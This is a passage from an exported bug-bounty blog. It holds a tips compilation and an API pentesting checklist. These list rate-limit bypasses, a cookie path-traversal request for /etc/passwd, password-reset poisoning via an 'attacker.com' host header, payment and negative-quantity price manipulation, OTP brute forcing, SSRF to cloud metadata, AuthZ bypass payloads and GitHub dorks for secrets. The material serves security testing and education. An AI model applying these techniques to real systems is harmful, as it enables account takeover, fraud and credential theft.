r-ad9z0x r-bcqeeo r-qvutc0">1. Find a Gitlab hosted sub domain, usually named “code.domain” or “gitlab.domain” </span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">2. Even if login is required, try the
“/snippets” endpoint. </span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">3. View internal source code snippets.</span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><br /></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"># Ways to bypass rate limit</span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">1. Use the following request-header: X-Remote-IP: 127.0.0.1</span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">2. Add 'Space' after the parameter value</span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">3. Using null byte and CRLF '%00, %0d%0a, %09, %20, %0'</span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">4. Changing user-agents and/or cookies</span></div><h3 style="text-align: left;"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><font color="#ff0000"><br /></font></span></h3><h3 style="text-align: left;"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><font color="#ff0000">File Upload</font> </span></h3><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"># </span>Extension list for File upload bugs ASP: </div><div>".aspx", ".config", ".ashx", ".asmx", ".aspq", ".axd", ".cshtm", ".cshtml", ".rem", ".soap", ".vbhtm", ".vbhtml", ".asa", ".asp", ".cer", "shtml"</div><div><br /></div><h3 style="text-align: left;"><font color="#ff0000">Local File Inclusion</font></h3><div># How to find local file read vulnerabilities based on cookies. </div><div>Request </div><div>GET /vulnerable.php HTTP/1.1 </div><div>Cookie:usid=../../../../../../../../../../../../../etc/passwd </div><div><br /></div><div>Response </div><div>HTTP/1.1 200 OK </div><div>... </div><div>Server: Apache root:fi3sER6:0:1:System Operator:/:/bin/ksh//</div><div><br /></div><div># If you've got a cloud system and a LFI always have a peak at /etc/fstab you might be able to find more mounts like S3 buckets or efs shares with more juice.</div><div><br /></div><div># Escalate local file Inclusion</div><div>Try these files: "/proc/self/cmdline" "/proc/self/environ". There might be keys or other sensitive information in there or it might give you ideas for other paths to investigate.</div><div><br /></div><h3 style="text-align: left;"><font color="#ff0000">Account Takeover</font></h3><div>#</div><div>1. Go to forget password add email > reset password</div><div>2. Intercept this request.</div><div>3. Add "X-forwarded-host: attacker.com"</div><div>4. Forward this request and check your email inbox.</div><div>5. If password reset link look like "http://www.attacker.com/reset-password/<reset_token></div><div>6. For confirmation of password reset link valid or not, replace attacker.com URL with original URL click go.</div><div><br /></div><div>#Using the password reset code more than once</div><div><br /></div><div>Reset password base64 code/token:</div><div>cGFzc3dvcmR0b2tlbg=</div><div><br /></div><div>Add another equal:</div><div>cGFzc3dvcmR0b2tlbg==</div><div><br /></div><div>Add another equal:</div><div>cGFzc3dvcmR0b2tlbg===</div><div><br /></div><div>Each time you add another equal, the code will work again.</div><h3 style="text-align: left;"><font color="#ff0000"><br /></font></h3><h3 style="text-align: left;"><font color="#ff0000">Full Path Disclosure</font></h3><div># A useful tip for finding Full Path Disclosure vulnerabilities </div><div>Drop an array ([] or even [1,2,3]) into a parameter. This can produce a full path disclosure error in response.</div><h3 style="text-align: left;"><font color="#ff0000"><br /></font></h3><h3 style="text-align: left;"><font color="#ff0000">Price Manipulation Bugs</font></h3><div># Bypass the payment process and get the product without paying</div><div><br /></div><div>1. It is preferable to choose Paypal or CoinPayments as a payment method.</div><div>2. Intercept all requests, you may find a parameter called 'Success' or 'Referrer' or 'Callback'</div><div>3. If the value inside the parameter has a URL like this example.com/payment/MD5HASH for example</div><div>4. Copy it, and open it in a new window, you will find that your payment was successful.</div><div><br /></div><div># If the product price parameter can not be changed, change the quantity of products</div><div><br /></div><div>items[1][quantity]=1 --> 234 $</div><div>items[1][quantity]=0.1 --> 23.4 $</div><div><br /></div><div>Congratulations, you bought the order for 1% of the price.</div><div><br /></div><div># </div><div>1. Add two products to the basket [Let's consider a single product $40 ]</div><div>2. If the request is processed in this way : {"items":{"laptop":1,"mobile":1}}</div><div>3. Change the JSON body to {"items":{"laptop":4,"mobile":-2}}</div><div>4. The cost will become $20 for two items: 4 * $40 - 2 * $70 = $160 - $140 = $20</div><div><br /></div><div><h3 style="text-align: left;"><span style="color: red;">2FA</span></h3># No limit to send OTP by SMS<br />Impact would be DoS on user's phone<br /><br /># No limit to refresh OTP<br />You can "infinitely" brute OTP constantly refreshing it with a low probability to guess<br /><br /># Bruteforce OTP if there is no limit to verify OTP<br /><br /># Check if <br />No 2FA for disabling 2FA in account<br />No 2FA confirmation for password change<br />After 2FA activation other existing sessions still active/<br />You can reuse OTP from one action to other. <br />You can reuse your OTP to login as another user.<br /><br /># Observed if, after password check a valid session has been created - Ignore 2FA <br /><br /># OTP is associated with token. After refreshing a new OTP associated with a new token, but old pair is still valid.<br /><br /># Sometimes OTP is leaked in header, response body or error<br /><br /># Try to send OTP for different users in the same second.<br /></div><div><br /></div><div><br /></div><div><br /></div><div>Credits:</div><div><div>ADITYASHENDE17, jae_hak99, Random_Robbie, SalahHasoneh1, heald_ben, hsakarp_ilajna, Jhaddix, th3hokag3, Virdoex_hunter, Harshithvelneni, chiraggupta8769, trbughunters, EngMada9, scspcommunity, _n0nce, lutfumertceylan, cybersec_feeds, manas_hunter, AkaaZaan, Random_Robbie</div><div>, bpruston, AmitMDubey, hackerscrolls<br /></div></div><div><br /></div><div><br /></div><div>(If you like the blog, share it with others 💓. </div><div>DM or tag me in tweets if you want to include any other bugbountytips in this blog.)</div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div>Latish Danawalehttp://www.blogger.com/profile/00084840439148244930noreply@blogger.com0tag:blogger.com,1999:blog-1382879664613470931.post-89356901814409811622020-07-25T05:54:00.004-07:002020-08-02T08:22:30.218-07:00API Testing ChecklistCheckpoints:<br /><br />1. Older APIs versions tend to be more vulnerable and they lack security mechanisms.<br />Leverage the predictable nature of REST APIs to find old versions.<br />Saw a call to 'api/v3/login'? Check if 'api/v1/login' exists as well. It might be more vulnerable.<br /><br />2. Never assume there’s only one way to authenticate to an API!<br />Modern apps have many API endpoints for AuthN: `/api/mobile/login` | `/api/v3/login` | `/api/magic_link`; etc. Find and test all of them for AuthN problems.<br /><br />3. Remember how SQL Injections used to be extremely common 5-10 years ago, and you could break into almost every company? BOLA (IDOR) is the new epidemic of API security.<br /><br />4. Testing a Ruby on Rails App & noticed an HTTP parameter containing a URL?<br />Developers sometimes use "Kernel#open" function to access URLs == Game Over.<br />Just send a pipe as the first character and then a shell command (Command Injection by design)<br /><br />Reference Link: https://apidock.com/ruby/Kernel/open<br /><br />5. Found SSRF? use it for:<br />- Internal port scanning<br />- Leverage cloud services(like 169.254.169.254)<br />-Use http://webhook.site to reveal IP Address & HTTP Library<br />-Download a very large file (Layer 7 DoS)<br />-Reflective SSRF? disclose local mgmt consoles<br /><br />6. Mass Assignment is a real thing.<br />Modern frameworks encourage developers to use MA without understanding the security implications.<br />During exploitation, don't guess object's properties names, simply find a GET endpoint that returns all of them. <br /><br />7. A company exposes an API for developers?<br />This is not the same API which is used by mobile / web application. Always test them separately.<br />Don't assume they implement the same security mechanisms.<br /><br />8. Check if the API supports SOAP also.<br />Change the content-type to "application/xml", add a simple XML in the request body, and see how the API handles it.<br /><br />9. IDs in the HTTP bodies/headers tend to be more vulnerable than IDs in URLs. Try to focus on them first.<br /><br />10. Exploiting BFLA (Broken Function Level Authorization)?<br />Leverage the predictable nature of REST to find admin API endpoints!<br />E.g: you saw the following API call `GET /api/v1/users/<id>`<br />Give it a chance and change to DELETE / POST to create/delete users<br /><br />11. The API uses Authorization header? Forget about CSRF!<br />If the authentication mechanism doesn't support cookies, the API is protected against CSRF by design.<br /><br />12. Even if the ID is GUID or non-numeric, try to send a numeric value.<br />For example: "/?user_id=111" instead of "user_id=inon@traceable.ai"<br />Sometimes the AuthZ mechanism supports both and it's easier the brute force numbers.<br /><br />13. Use Mass Assignment to bypass security mechanisms.<br />E.g., "enter password" mechanism:<br />- `POST /api/rest_pass` requires old password.<br />- `PUT /api/update_user` is vulnerable to MA == can be used to update pass without sending the old one (For CSRF)<br /><br />14. Got stuck during an API pentest? Expand your attack surface! Find sub/sibling domains using http://Virustotal.com & http://Censys.io. <br />Some of these domains might expose the same APIs with different configurations/versions.<br /><br />15. Static resource==photo,video,..<br />Web Servers(IIS, Apache) treat static resources differently when it comes to authorization.<br />Even if developers implemented decent authorization, there's a good chance you can access static resources of other users.<br /><br />16. Even if you use another web proxy, always use Burp in the background. <br />The guys at @PortSwigger<br /> are doing a really good job at helping you manage your pentest.<br />Use the “tree view” (free version) feature to see all API endpoints you’ve accessed.<br /><br />17. Mobile Certificate Pinning?<br />Before you start reverse engineering & patching the client app, check for both iOS & Android clients and older versions of them.<br />There's a decent chance that the pinning isn't enabled in one of them. Save time.<br /><br />18. Companies & developers tend to put more resources (including security) into the main APIs.<br />Always look for the most niche features that nobody uses to find interesting vulnerabilities.<br />"POST /api/profile/upload_christmas_voice_greeting"<br /><br />19. Which features do you find tend to be more vulnerable? <br />I'll start: <br />- Organization's user management <br />- Export to CSV/HTML/PDF <br />- Custom views of dashboards <br />- Sub user creation&management <br />- Object sharing (photos, posts,etc)<br /><br />20. Testing AuthN APIs?<br />If you test in production, there's a good chance that AuthN endpoints have anti brute-force protection.<br />Anyhow, DevOps engineers tend to disable rate limiting in non-production environments. Don't forget to test them :)<br /><br />21. Got stuck during an API pentest? Expand the attack surface! <br />Use http://archive.com, find old versions of the web-app and explore new API endpoints. <br />Can't use the client? scan the .js files for URLs. Some of them are API endpoints.<br /><br />22. APIs tend to leak PII by design.<br />BE engineers return raw JSON objects and rely on FE engineers to filter out sensitive data.<br />Found a sensitive resource (e.g, "receipt")? Find all the EPs that return it: "/download_receipt","/export_receipt", etc..<br /><br />23. Found a way to download arbitrary files from a web server? <br />Shift the test from black-box to white-box.<br />Download the source code of the app (DLL files: use IL-spy; Compiled Java - use Luyten)<br />Read the code and find new issues!<br /><br />24. Remember: developers often disable security mechanisms in non-production environments (qa/staging/etc); <br />Leverage this fact to bypass AuthZ, AuthN, rate limiting & input validation.<br /><br />25. Found an "export to PDF" feature? <br />There's a good chance the developers use an external library to convert HTML --> PDF behind the scenes.<br />Try to inject HTML elements and cause "Export Injection".<br /><br />26. AuthZ bypass tricks:<br />* Wrap ID with an array {“id”:111} --> {“id”:[111]}<br />* JSON wrap {“id”:111} --> {“id”:{“id”:111}}<br />* Send ID twice URL?id=<LEGIT>&id=<VICTIM><br />* Send wildcard {"user_id":"*"}<br /><br />27. BE Servers no longer responsible for protecting against XSS.<br />APIs don't return HTML, but JSON instead.<br />If API returns XSS payload? - <br />E.g: {"name":"In<script>alert(21)</script>on}<br />That's fine! The protection always needs to be on the client side<div><br /></div><div>28. Always try to send "INVALID CONTENT TYPE" you will end up getting hidden endpoints in "RESPONSE".</div><div><br /></div><div>29. <span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">Found a GraphQL endpoint? <br /></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">Send the following query to list the whole schema of the endpoint. It will list all objects and the fields they have. <br /></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">
{__schema{types{name,kind,description,fields{name,type{name}}}}} <br /></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"></span><br /><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">PS: It doesn't work if introspection is disabled.</span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><br /></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">30. </span><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">GiHub Dorks for Finding API Keys, Tokens and Passwords <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">api_key <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">"api keys" <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">authorization_bearer: <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">oauth <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">auth <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">authentication <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">client_secret <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">api_token: <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">"api token" <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">client_id <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">password <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">user_password <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">user_pass <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">passcode <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">client_secret <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">secret <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">password hash <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">OTP <br /></span></span></div><div><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0"><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">user auth</span></span></div><div><br /><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">
</span></div><div><br />Credits: traceableai, s0md3v, D0cK3rG33k<br /></div>Latish Danawalehttp://www.blogger.com/profile/00084840439148244930noreply@blogger.com4tag:blogger.com,1999:blog-1382879664613470931.post-89298454686624611532017-11-17T23:27:00.001-08:002020-07-30T13:02:11.826-07:00About Me.<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEje9sFzJGl1gp8QXoxdsUYfXUPKnXQHkUe3cxpFIKSlx6HB6k10Gkjpq8eHh9kz0KXevITjVW5hdiebDwjzMvOuHgJp0MBsHpSq30mDdb_afrQNppdbLtaiFJbXoBTN8i_pRmQC7Tp5ecA/s1600/me.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="852" data-original-width="852" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEje9sFzJGl1gp8QXoxdsUYfXUPKnXQHkUe3cxpFIKSlx6HB6k10Gkjpq8eHh9kz0KXevITjVW5hdiebDwjzMvOuHgJp0MBsHpSq30mDdb_afrQNppdbLtaiFJbXoBTN8i_pRmQC7Tp5ecA/s320/me.jpg" width="320" /></a></div>
<br />
<br />
<span style="color: lime; font-family: "courier new" , "courier" , monospace;"><b style="background-color: black;"><span style="background-color: black;">I am a security enthusiast in the areas of web-applications, network engineering & mobile applications, programming is also a part of my interests (Python lover :p).Also work as an individual web-application security engineer with broad experience in all aspects of security management and implementation. I am looking forward towards hardening skills in various security standards. As a part of my core interest, always prefer consuming my leisure's in performing individual security audits and vulnerability assessments or source code analysis. I am also a bug bounty hunter. I participated in all major bug bounty programs organised by internet giants like Google, Microsoft,Apple, Bugcrowd,…..etc I have 4+ years of expertise in both black box as well as white box penetration testing</span><span style="background-color: black; font-size: 13px;">.</span></b></span><br />
<span style="background-color: white; color: lime;"><span style="font-family: "courier new", "courier", monospace;"><b><span style="font-size: 13px;"><br /></span></b></span></span><br />
<span style="color: #333333; font-family: "courier new" , "courier" , monospace;"><span style="background-color: white; font-size: 13px;"><b><br /></b></span></span>
<span style="color: #333333; font-family: "courier new" , "courier" , monospace;"><span style="font-size: 13px;"><b style="background-color: black;"><a href="https://twitter.com/www_latish" target="_blank">Twitter</a>: </b></span></span><br />
<span style="color: #333333; font-family: "courier new" , "courier" , monospace;"><span style="background-color: white; font-size: 13px;"><br /></span></span>
<span style="color: #333333; font-family: "courier new" , "courier" , monospace;"><span style="font-size: 13px;"><a href="https://www.facebook.com/latish.danawale.14" style="background-color: black;" target="_blank">Facebook</a></span></span><br />
<span style="color: #333333; font-family: "courier new" , "courier" , monospace;"><br /></span>
<span style="color: #333333; font-family: "courier new" , "courier" , monospace;"><br /></span>
</div>
Latish Danawalehttp://www.blogger.com/profile/00084840439148244930noreply@blogger.com0